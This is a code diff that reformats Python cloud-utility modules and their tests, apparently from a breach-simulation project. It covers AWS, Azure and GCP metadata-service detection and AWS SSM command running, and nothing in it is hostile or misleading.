subprocess.call((GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True) # noqa: DUO116
subprocess.call(
(GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True
) # noqa: DUO116
LOGGER.info("GCP machines stopped successfully.")
except Exception as e:
LOGGER.error("GCP Handler failed to stop network machines: %s" % e)

View File

@ -2,10 +2,14 @@ import pytest
def pytest_addoption(parser):
parser.addoption("--island", action="store", default="",
help="Specify the Monkey Island address (host+port).")
parser.addoption(
"--island",
action="store",
default="",
help="Specify the Monkey Island address (host+port).",
)
@pytest.fixture(scope='module')
@pytest.fixture(scope="module")
def island(request):
return request.config.getoption("--island")

View File

@ -31,22 +31,21 @@ machine_list = {
}
@pytest.fixture(scope='class')
@pytest.fixture(scope="class")
def island_client(island):
island_client_object = MonkeyIslandClient(island)
yield island_client_object
@pytest.mark.usefixtures('island_client')
@pytest.mark.usefixtures("island_client")
# noinspection PyUnresolvedReferences
class TestOSCompatibility(object):
def test_os_compat(self, island_client):
print()
all_monkeys = island_client.get_all_monkeys_from_db()
ips_that_communicated = []
for monkey in all_monkeys:
for ip in monkey['ip_addresses']:
for ip in monkey["ip_addresses"]:
if ip in machine_list:
ips_that_communicated.append(ip)
break

View File

@ -1 +1 @@
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"

View File

@ -1 +1 @@
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"

View File

@ -1 +1 @@
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"

View File

@ -6,11 +6,11 @@ import requests
from common.cloud.environment_names import Environment
from common.cloud.instance import CloudInstance
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
AWS_LATEST_METADATA_URI_PREFIX = "http://{0}/latest/".format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
ACCOUNT_ID_KEY = "accountId"
logger = logging.getLogger(__name__)
@ -20,6 +20,7 @@ class AwsInstance(CloudInstance):
"""
Class which gives useful information about the current instance you're on.
"""
def is_instance(self):
return self.instance_id is not None
@ -32,25 +33,35 @@ class AwsInstance(CloudInstance):
self.account_id = None
try:
response = requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2)
response = requests.get(
AWS_LATEST_METADATA_URI_PREFIX + "meta-data/instance-id", timeout=2
)
self.instance_id = response.text if response else None
self.region = self._parse_region(
requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').text)
requests.get(
AWS_LATEST_METADATA_URI_PREFIX + "meta-data/placement/availability-zone"
).text
)
except (requests.RequestException, IOError) as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))
try:
self.account_id = self._extract_account_id(
requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).text)
requests.get(
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
).text
)
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e))
logger.debug(
"Failed init of AwsInstance while getting dynamic instance data: {}".format(e)
)
@staticmethod
def _parse_region(region_url_response):
# For a list of regions, see:
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
# This regex will find any AWS region format string in the response.
re_phrase = r'((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])'
re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])"
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
if finding:
return finding[0]

View File

@ -6,24 +6,27 @@ from botocore.exceptions import ClientError
from common.cloud.aws.aws_instance import AwsInstance
__author__ = ['itay.mizeretz', 'shay.nehmad']
__author__ = ["itay.mizeretz", "shay.nehmad"]
INSTANCE_INFORMATION_LIST_KEY = 'InstanceInformationList'
INSTANCE_ID_KEY = 'InstanceId'
COMPUTER_NAME_KEY = 'ComputerName'
PLATFORM_TYPE_KEY = 'PlatformType'
IP_ADDRESS_KEY = 'IPAddress'
INSTANCE_INFORMATION_LIST_KEY = "InstanceInformationList"
INSTANCE_ID_KEY = "InstanceId"
COMPUTER_NAME_KEY = "ComputerName"
PLATFORM_TYPE_KEY = "PlatformType"
IP_ADDRESS_KEY = "IPAddress"
logger = logging.getLogger(__name__)
def filter_instance_data_from_aws_response(response):
return [{
'instance_id': x[INSTANCE_ID_KEY],
'name': x[COMPUTER_NAME_KEY],
'os': x[PLATFORM_TYPE_KEY].lower(),
'ip_address': x[IP_ADDRESS_KEY]
} for x in response[INSTANCE_INFORMATION_LIST_KEY]]
return [
{
"instance_id": x[INSTANCE_ID_KEY],
"name": x[COMPUTER_NAME_KEY],
"os": x[PLATFORM_TYPE_KEY].lower(),
"ip_address": x[IP_ADDRESS_KEY],
}
for x in response[INSTANCE_INFORMATION_LIST_KEY]
]
class AwsService(object):
@ -45,8 +48,8 @@ class AwsService(object):
@staticmethod
def get_client(client_type, region=None):
return boto3.client(
client_type,
region_name=region if region is not None else AwsService.region)
client_type, region_name=region if region is not None else AwsService.region
)
@staticmethod
def get_session():
@ -54,12 +57,12 @@ class AwsService(object):
@staticmethod
def get_regions():
return AwsService.get_session().get_available_regions('ssm')
return AwsService.get_session().get_available_regions("ssm")
@staticmethod
def test_client():
try:
AwsService.get_client('ssm').describe_instance_information()
AwsService.get_client("ssm").describe_instance_information()
return True
except ClientError:
return False

View File

@ -2,14 +2,13 @@ import pytest
import requests
import requests_mock
from common.cloud.aws.aws_instance import (AWS_LATEST_METADATA_URI_PREFIX,
AwsInstance)
from common.cloud.aws.aws_instance import AWS_LATEST_METADATA_URI_PREFIX, AwsInstance
from common.cloud.environment_names import Environment
INSTANCE_ID_RESPONSE = 'i-1234567890abcdef0'
INSTANCE_ID_RESPONSE = "i-1234567890abcdef0"
AVAILABILITY_ZONE_RESPONSE = 'us-west-2b'
AVAILABILITY_ZONE_RESPONSE = "us-west-2b"
# from https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
@ -33,34 +32,33 @@ INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
"""
EXPECTED_INSTANCE_ID = 'i-1234567890abcdef0'
EXPECTED_INSTANCE_ID = "i-1234567890abcdef0"
EXPECTED_REGION = 'us-west-2'
EXPECTED_REGION = "us-west-2"
EXPECTED_ACCOUNT_ID = '123456789012'
EXPECTED_ACCOUNT_ID = "123456789012"
def get_test_aws_instance(text={'instance_id': None,
'region': None,
'account_id': None},
exception={'instance_id': None,
'region': None,
'account_id': None}):
def get_test_aws_instance(
text={"instance_id": None, "region": None, "account_id": None},
exception={"instance_id": None, "region": None, "account_id": None},
):
with requests_mock.Mocker() as m:
# request made to get instance_id
url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id'
m.get(url, text=text['instance_id']) if text['instance_id'] else m.get(
url, exc=exception['instance_id'])
url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id"
m.get(url, text=text["instance_id"]) if text["instance_id"] else m.get(
url, exc=exception["instance_id"]
)
# request made to get region
url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone'
m.get(url, text=text['region']) if text['region'] else m.get(
url, exc=exception['region'])
url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone"
m.get(url, text=text["region"]) if text["region"] else m.get(url, exc=exception["region"])
# request made to get account_id
url = f'{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document'
m.get(url, text=text['account_id']) if text['account_id'] else m.get(
url, exc=exception['account_id'])
url = f"{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document"
m.get(url, text=text["account_id"]) if text["account_id"] else m.get(
url, exc=exception["account_id"]
)
test_aws_instance_object = AwsInstance()
return test_aws_instance_object
@ -69,9 +67,13 @@ def get_test_aws_instance(text={'instance_id': None,
# all good data
@pytest.fixture
def good_data_mock_instance():
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
'region': AVAILABILITY_ZONE_RESPONSE,
'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE})
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
}
)
def test_is_instance_good_data(good_data_mock_instance):
@ -97,9 +99,13 @@ def test_get_account_id_good_data(good_data_mock_instance):
# 'region' bad data
@pytest.fixture
def bad_region_data_mock_instance():
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
'region': 'in-a-different-world',
'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE})
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": "in-a-different-world",
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
}
)
def test_is_instance_bad_region_data(bad_region_data_mock_instance):
@ -125,9 +131,13 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance):
# 'account_id' bad data
@pytest.fixture
def bad_account_id_data_mock_instance():
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
'region': AVAILABILITY_ZONE_RESPONSE,
'account_id': 'who-am-i'})
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": "who-am-i",
}
)
def test_is_instance_bad_account_id_data(bad_account_id_data_mock_instance):
@ -153,35 +163,37 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan
# 'instance_id' bad requests
@pytest.fixture
def bad_instance_id_request_mock_instance(instance_id_exception):
return get_test_aws_instance(text={'instance_id': None,
'region': AVAILABILITY_ZONE_RESPONSE,
'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE},
exception={'instance_id': instance_id_exception,
'region': None,
'account_id': None})
return get_test_aws_instance(
text={
"instance_id": None,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
},
exception={"instance_id": instance_id_exception, "region": None, "account_id": None},
)
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
def test_is_instance_bad_instance_id_request(bad_instance_id_request_mock_instance):
assert bad_instance_id_request_mock_instance.is_instance() is False
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
def test_get_cloud_provider_name_bad_instance_id_request(bad_instance_id_request_mock_instance):
assert bad_instance_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
def test_get_instance_id_bad_instance_id_request(bad_instance_id_request_mock_instance):
assert bad_instance_id_request_mock_instance.get_instance_id() is None
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
def test_get_region_bad_instance_id_request(bad_instance_id_request_mock_instance):
assert bad_instance_id_request_mock_instance.get_region() is None
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_instance):
assert bad_instance_id_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID
@ -189,35 +201,37 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins
# 'region' bad requests
@pytest.fixture
def bad_region_request_mock_instance(region_exception):
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
'region': None,
'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE},
exception={'instance_id': None,
'region': region_exception,
'account_id': None})
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": None,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
},
exception={"instance_id": None, "region": region_exception, "account_id": None},
)
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
def test_is_instance_bad_region_request(bad_region_request_mock_instance):
assert bad_region_request_mock_instance.is_instance()
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
def test_get_cloud_provider_name_bad_region_request(bad_region_request_mock_instance):
assert bad_region_request_mock_instance.get_cloud_provider_name() == Environment.AWS
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
def test_get_instance_id_bad_region_request(bad_region_request_mock_instance):
assert bad_region_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
def test_get_region_bad_region_request(bad_region_request_mock_instance):
assert bad_region_request_mock_instance.get_region() is None
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
assert bad_region_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID
@ -225,35 +239,37 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
# 'account_id' bad requests
@pytest.fixture
def bad_account_id_request_mock_instance(account_id_exception):
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
'region': AVAILABILITY_ZONE_RESPONSE,
'account_id': None},
exception={'instance_id': None,
'region': None,
'account_id': account_id_exception})
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": None,
},
exception={"instance_id": None, "region": None, "account_id": account_id_exception},
)
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
def test_is_instance_bad_account_id_request(bad_account_id_request_mock_instance):
assert bad_account_id_request_mock_instance.is_instance()
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
def test_get_cloud_provider_name_bad_account_id_request(bad_account_id_request_mock_instance):
assert bad_account_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
def test_get_instance_id_bad_account_id_request(bad_account_id_request_mock_instance):
assert bad_account_id_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
def test_get_region_bad_account_id_request(bad_account_id_request_mock_instance):
assert bad_account_id_request_mock_instance.get_region() == EXPECTED_REGION
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
def test_get_account_id_bad_account_id_request(bad_account_id_request_mock_instance):
assert bad_account_id_request_mock_instance.get_account_id() is None
@ -263,15 +279,15 @@ def test_get_account_id_bad_account_id_request(bad_account_id_request_mock_insta
def not_found_request_mock_instance():
with requests_mock.Mocker() as m:
# request made to get instance_id
url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id'
url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id"
m.get(url, status_code=404)
# request made to get region
url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone'
url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone"
m.get(url)
# request made to get account_id
url = f'{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document'
url = f"{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document"
m.get(url)
not_found_aws_instance_object = AwsInstance()

View File

@ -3,7 +3,7 @@ from unittest import TestCase
from .aws_service import filter_instance_data_from_aws_response
__author__ = 'shay.nehmad'
__author__ = "shay.nehmad"
class TestFilterInstanceDataFromAwsResponse(TestCase):
@ -49,10 +49,10 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
}
"""
self.assertEqual(filter_instance_data_from_aws_response(json.loads(json_response_empty)), [])
self.assertEqual(
filter_instance_data_from_aws_response(json.loads(json_response_empty)), []
)
self.assertEqual(
filter_instance_data_from_aws_response(json.loads(json_response_full)),
[{'instance_id': 'string',
'ip_address': 'string',
'name': 'string',
'os': 'string'}])
[{"instance_id": "string", "ip_address": "string", "name": "string", "os": "string"}],
)

View File

@ -8,7 +8,9 @@ from common.cloud.instance import CloudInstance
from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
AZURE_METADATA_SERVICE_URL = (
"http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
)
logger = logging.getLogger(__name__)
@ -18,6 +20,7 @@ class AzureInstance(CloudInstance):
Access to useful information about the current machine if it's an Azure VM.
Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
"""
def is_instance(self):
return self._on_azure
@ -34,9 +37,11 @@ class AzureInstance(CloudInstance):
self._on_azure = False
try:
response = requests.get(AZURE_METADATA_SERVICE_URL,
response = requests.get(
AZURE_METADATA_SERVICE_URL,
headers={"Metadata": "true"},
timeout=SHORT_REQUEST_TIMEOUT)
timeout=SHORT_REQUEST_TIMEOUT,
)
# If not on cloud, the metadata URL is non-routable and the connection will fail.
# If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
@ -46,7 +51,9 @@ class AzureInstance(CloudInstance):
else:
logger.warning(f"Metadata response not ok: {response.status_code}")
except requests.RequestException:
logger.debug("Failed to get response from Azure metadata service: This instance is not on Azure.")
logger.debug(
"Failed to get response from Azure metadata service: This instance is not on Azure."
)
def try_parse_response(self, response):
try:

View File

@ -3,83 +3,103 @@ import requests
import requests_mock
import simplejson
from common.cloud.azure.azure_instance import (AZURE_METADATA_SERVICE_URL,
AzureInstance)
from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureInstance
from common.cloud.environment_names import Environment
GOOD_DATA = {
'compute': {'azEnvironment': 'AZUREPUBLICCLOUD',
'isHostCompatibilityLayerVm': 'true',
'licenseType': 'Windows_Client',
'location': 'westus',
'name': 'examplevmname',
'offer': 'Windows',
'osProfile': {'adminUsername': 'admin',
'computerName': 'examplevmname',
'disablePasswordAuthentication': 'true'},
'osType': 'linux',
'placementGroupId': 'f67c14ab-e92c-408c-ae2d-da15866ec79a',
'plan': {'name': 'planName',
'product': 'planProduct',
'publisher': 'planPublisher'},
'platformFaultDomain': '36',
'platformUpdateDomain': '42',
'publicKeys': [{'keyData': 'ssh-rsa 0',
'path': '/home/user/.ssh/authorized_keys0'},
{'keyData': 'ssh-rsa 1',
'path': '/home/user/.ssh/authorized_keys1'}],
'publisher': 'RDFE-Test-Microsoft-Windows-Server-Group',
'resourceGroupName': 'macikgo-test-may-23',
'resourceId': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/'
'providers/Microsoft.Compute/virtualMachines/examplevmname',
'securityProfile': {'secureBootEnabled': 'true',
'virtualTpmEnabled': 'false'},
'sku': 'Windows-Server-2012-R2-Datacenter',
'storageProfile': {'dataDisks': [{'caching': 'None',
'createOption': 'Empty',
'diskSizeGB': '1024',
'image': {'uri': ''},
'lun': '0',
'managedDisk': {'id': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/'
'resourceGroups/macikgo-test-may-23/providers/'
'Microsoft.Compute/disks/exampledatadiskname',
'storageAccountType': 'Standard_LRS'},
'name': 'exampledatadiskname',
'vhd': {'uri': ''},
'writeAcceleratorEnabled': 'false'}],
'imageReference': {'id': '',
'offer': 'UbuntuServer',
'publisher': 'Canonical',
'sku': '16.04.0-LTS',
'version': 'latest'},
'osDisk': {'caching': 'ReadWrite',
'createOption': 'FromImage',
'diskSizeGB': '30',
'diffDiskSettings': {'option': 'Local'},
'encryptionSettings': {'enabled': 'false'},
'image': {'uri': ''},
'managedDisk': {'id': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/'
'resourceGroups/macikgo-test-may-23/providers/'
'Microsoft.Compute/disks/exampleosdiskname',
'storageAccountType': 'Standard_LRS'},
'name': 'exampleosdiskname',
'osType': 'Linux',
'vhd': {'uri': ''},
'writeAcceleratorEnabled': 'false'}},
'subscriptionId': 'xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx',
'tags': 'baz:bash;foo:bar',
'version': '15.05.22',
'vmId': '02aab8a4-74ef-476e-8182-f6d2ba4166a6',
'vmScaleSetName': 'crpteste9vflji9',
'vmSize': 'Standard_A3',
'zone': ''},
'network': {'interface': [{'ipv4': {'ipAddress': [{'privateIpAddress': '10.144.133.132',
'publicIpAddress': ''}],
'subnet': [{'address': '10.144.133.128',
'prefix': '26'}]},
'ipv6': {'ipAddress': []},
'macAddress': '0011AAFFBB22'}]}
"compute": {
"azEnvironment": "AZUREPUBLICCLOUD",
"isHostCompatibilityLayerVm": "true",
"licenseType": "Windows_Client",
"location": "westus",
"name": "examplevmname",
"offer": "Windows",
"osProfile": {
"adminUsername": "admin",
"computerName": "examplevmname",
"disablePasswordAuthentication": "true",
},
"osType": "linux",
"placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a",
"plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"},
"platformFaultDomain": "36",
"platformUpdateDomain": "42",
"publicKeys": [
{"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"},
{"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"},
],
"publisher": "RDFE-Test-Microsoft-Windows-Server-Group",
"resourceGroupName": "macikgo-test-may-23",
"resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/"
"providers/Microsoft.Compute/virtualMachines/examplevmname",
"securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"},
"sku": "Windows-Server-2012-R2-Datacenter",
"storageProfile": {
"dataDisks": [
{
"caching": "None",
"createOption": "Empty",
"diskSizeGB": "1024",
"image": {"uri": ""},
"lun": "0",
"managedDisk": {
"id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"resourceGroups/macikgo-test-may-23/providers/"
"Microsoft.Compute/disks/exampledatadiskname",
"storageAccountType": "Standard_LRS",
},
"name": "exampledatadiskname",
"vhd": {"uri": ""},
"writeAcceleratorEnabled": "false",
}
],
"imageReference": {
"id": "",
"offer": "UbuntuServer",
"publisher": "Canonical",
"sku": "16.04.0-LTS",
"version": "latest",
},
"osDisk": {
"caching": "ReadWrite",
"createOption": "FromImage",
"diskSizeGB": "30",
"diffDiskSettings": {"option": "Local"},
"encryptionSettings": {"enabled": "false"},
"image": {"uri": ""},
"managedDisk": {
"id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"resourceGroups/macikgo-test-may-23/providers/"
"Microsoft.Compute/disks/exampleosdiskname",
"storageAccountType": "Standard_LRS",
},
"name": "exampleosdiskname",
"osType": "Linux",
"vhd": {"uri": ""},
"writeAcceleratorEnabled": "false",
},
},
"subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
"tags": "baz:bash;foo:bar",
"version": "15.05.22",
"vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6",
"vmScaleSetName": "crpteste9vflji9",
"vmSize": "Standard_A3",
"zone": "",
},
"network": {
"interface": [
{
"ipv4": {
"ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}],
"subnet": [{"address": "10.144.133.128", "prefix": "26"}],
},
"ipv6": {"ipAddress": []},
"macAddress": "0011AAFFBB22",
}
]
},
}
@ -89,7 +109,7 @@ http-equiv="Content-Type" />\n<meta content="no-cache" http-equiv="Pragma" />\n<
javascript">\nvar pageName = \'/\';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> </body>\n</html>\n'
BAD_DATA_JSON = {'': ''}
BAD_DATA_JSON = {"": ""}
def get_test_azure_instance(url, **kwargs):
@ -114,9 +134,9 @@ def test_get_cloud_provider_name_good_data(good_data_mock_instance):
def test_try_parse_response_good_data(good_data_mock_instance):
assert good_data_mock_instance.instance_name == GOOD_DATA['compute']['name']
assert good_data_mock_instance.instance_id == GOOD_DATA['compute']['vmId']
assert good_data_mock_instance.location == GOOD_DATA['compute']['location']
assert good_data_mock_instance.instance_name == GOOD_DATA["compute"]["name"]
assert good_data_mock_instance.instance_id == GOOD_DATA["compute"]["vmId"]
assert good_data_mock_instance.location == GOOD_DATA["compute"]["location"]
# good request, bad data (json)

View File

@ -16,6 +16,7 @@ class GcpInstance(CloudInstance):
"""
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
"""
def is_instance(self):
return self._on_gcp
@ -37,9 +38,17 @@ class GcpInstance(CloudInstance):
logger.warning("Got unexpected GCP Metadata format")
else:
if not response.headers["Metadata-Flavor"] == "Google":
logger.warning("Got unexpected Metadata flavor: {}".format(response.headers["Metadata-Flavor"]))
logger.warning(
"Got unexpected Metadata flavor: {}".format(
response.headers["Metadata-Flavor"]
)
)
else:
logger.warning("On GCP, but metadata response not ok: {}".format(response.status_code))
logger.warning(
"On GCP, but metadata response not ok: {}".format(response.status_code)
)
except requests.RequestException:
logger.debug("Failed to get response from GCP metadata service: This instance is not on GCP")
logger.debug(
"Failed to get response from GCP metadata service: This instance is not on GCP"
)
self._on_gcp = False

View File

@ -7,6 +7,7 @@ class CloudInstance(object):
The current machine can be a cloud instance (for example EC2 instance or Azure VM).
"""
def is_instance(self) -> bool:
raise NotImplementedError()

View File

@ -2,8 +2,8 @@ from enum import Enum
class CloudProviders(Enum):
AWS = 'aws'
AZURE = 'azure'
GCP = 'gcp'
ALIBABA = 'aliyun'
ORACLE = 'oci'
AWS = "aws"
AZURE = "azure"
GCP = "gcp"
ALIBABA = "aliyun"
ORACLE = "oci"

View File

@ -1,6 +1,6 @@
from common.cmd.cmd_result import CmdResult
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"
class AwsCmdResult(CmdResult):
@ -10,8 +10,11 @@ class AwsCmdResult(CmdResult):
def __init__(self, command_info):
super(AwsCmdResult, self).__init__(
self.is_successful(command_info, True), command_info['ResponseCode'], command_info['StandardOutputContent'],
command_info['StandardErrorContent'])
self.is_successful(command_info, True),
command_info["ResponseCode"],
command_info["StandardOutputContent"],
command_info["StandardErrorContent"],
)
self.command_info = command_info
@staticmethod
@ -22,4 +25,6 @@ class AwsCmdResult(CmdResult):
:param is_timeout: Whether the given command timed out
:return: True if successful, False otherwise.
"""
return (command_info['Status'] == 'Success') or (is_timeout and (command_info['Status'] == 'InProgress'))
return (command_info["Status"] == "Success") or (
is_timeout and (command_info["Status"] == "InProgress")
)

View File

@ -5,7 +5,7 @@ from common.cmd.aws.aws_cmd_result import AwsCmdResult
from common.cmd.cmd_runner import CmdRunner
from common.cmd.cmd_status import CmdStatus
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"
logger = logging.getLogger(__name__)
@ -19,7 +19,7 @@ class AwsCmdRunner(CmdRunner):
super(AwsCmdRunner, self).__init__(is_linux)
self.instance_id = instance_id
self.region = region
self.ssm = AwsService.get_client('ssm', region)
self.ssm = AwsService.get_client("ssm", region)
def query_command(self, command_id):
return self.ssm.get_command_invocation(CommandId=command_id, InstanceId=self.instance_id)
@ -28,15 +28,18 @@ class AwsCmdRunner(CmdRunner):
return AwsCmdResult(command_info)
def get_command_status(self, command_info):
if command_info['Status'] == 'InProgress':
if command_info["Status"] == "InProgress":
return CmdStatus.IN_PROGRESS
elif command_info['Status'] == 'Success':
elif command_info["Status"] == "Success":
return CmdStatus.SUCCESS
else:
return CmdStatus.FAILURE
def run_command_async(self, command_line):
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
command_res = self.ssm.send_command(DocumentName=doc_name, Parameters={'commands': [command_line]},
InstanceIds=[self.instance_id])
return command_res['Command']['CommandId']
command_res = self.ssm.send_command(
DocumentName=doc_name,
Parameters={"commands": [command_line]},
InstanceIds=[self.instance_id],
)
return command_res["Command"]["CommandId"]

View File

@ -1,4 +1,4 @@
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"
class Cmd(object):

View File

@ -1,4 +1,4 @@
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"
class CmdResult(object):

View File

@ -6,7 +6,7 @@ from common.cmd.cmd import Cmd
from common.cmd.cmd_result import CmdResult
from common.cmd.cmd_status import CmdStatus
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"
logger = logging.getLogger(__name__)
@ -64,7 +64,7 @@ class CmdRunner(object):
